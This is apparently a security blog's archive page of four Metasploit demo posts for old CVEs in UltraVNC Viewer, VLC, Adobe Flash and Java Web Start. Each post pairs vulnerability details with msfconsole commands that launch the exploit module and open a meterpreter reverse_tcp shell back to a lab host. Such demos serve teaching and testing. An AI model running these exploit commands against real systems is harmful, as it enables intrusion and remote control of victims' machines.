Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2008-0610 UltraVNC 1.0.2 Client Buffer Overflow Metasploit Demo

Exploits, Metasploit

Timeline :

Vulnerability reported by the vendor the 2008-02-08
Metasploit PoC provided the 2012-03-26

PoC provided by :

noperand

Reference(s) :

CVE-2008-0610
OSVDB-42840

Affected version(s) :

UltraVNC Viewer 1.0.2 and 1.0.4 RC

Tested on Windows XP Pro SP3 with :

UltraVNC Viewer 1.0.2

Description :

This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack.

Commands :

use exploit/windows/vnc/ultravnc_viewer_bof
SET SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2008-5036 VLC Media Player RealText Subtitle Overflow Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability found by Tobias Klein
Vulnerability reported to the vendor by Tobias Klein the 2008-11-03
Coordinated public release of the vulnerability the 2008-11-05
Metasploit PoC provided the 2012-03-01

PoC provided by :

Tobias Klein
SkD
juan vazquez

Reference(s) :

CVE-2008-5036
OSVDB-49809
VideoLAN-SA-0810
TKADV2008-011

Affected version(s) :

VLC media player 0.9.5 down to 0.5.0

Tested on Windows XP Pro SP3 with :

VLC 0.9.4

Description :

This module exploits a stack buffer overflow vulnerability in VideoLAN VLC before 0.9.6. The vulnerability exists in the parsing of RealText subtitle files. In order to exploit this, this module will generate two files: The .mp4 file is used to trick your victim into running. The .rt file is the actual malicious file that triggers the vulnerability, which should be placed under the same directory as the .mp4 file.

Commands :

use exploit/windows/fileformat/vlc_realtext
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

use exploit/multi/handler
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

CVE-2012-0754 Adobe Flash Player MP4 Overflow Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability found by Alexander Gavrun from ZDI
Vulnerability reported to the vendor by ZDI the 2012-01-12
Coordinated public release of the vulnerability the 2012-02-15
Vulnerability found exploited in the wild by contagio the 2012-03-02
Metasploit PoC provided the 2012-03-07

PoC provided by :

Alexander Gavrun
sinn3r
juan vazquez

Reference(s) :

CVE-2012-0754
OSVDB-79300
APSB12-03
ZDI-12-080
contagio

Affected version(s) :

Adobe Flash Player 11.1.102.55 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
Adobe Flash Player 11.1.112.61 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.5 and earlier versions for Android 3.x and 2.x

Tested on Windows XP Pro SP3 with :

Adobe Flash Player 11.1.102.55
Internet Explorer 8

Description :

This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt .mp4 file loaded by Flash, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the “Iran’s Oil and Nuclear Situation.doc” e-mail attack.

Commands :

use exploit/windows/browser/adobe_flash_mp4_cprt
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0500 Oracle Java Web Start Plugin Command Line Argument Injection Metasploit Demo

Exploits, Metasploit, , , ,

Timeline :

Vulnerability “ZDI-12-037” reported by Chris Ries to ZDI
Vulnerability reported to the vendor by ZDI the 2011-10-28 for “ZDI-12-037”
Coordinated public release of the vulnerability the 2012-02-22
Metasploit PoC provided the 2012-02-23

PoC provided by :

jduck

Reference(s) :

CVE-2012-0500
OSVDB-79227
ZDI-12-037
TSL20120214-01
Oracle Java SE Critical Patch Update Advisory – February 2012

Affected version(s) :

Oracle Java Development Kit (JDK) 6 Update 30 and prior
Oracle Java Development Kit (JDK) 7 Update 2 and prior
Oracle JavaFX 2.0.2 and prior
Oracle Java Runtime Environment (JRE) 6 Update 30 and prior
Oracle Java Runtime Environment (JRE) 7 Update 2 and prior

Tested on Windows XP Pro SP3 with :

Java 6 Update 30
Internet Explorer 8

Description :

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.

Commands :

use exploit/windows/browser/java_ws_vmargs
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid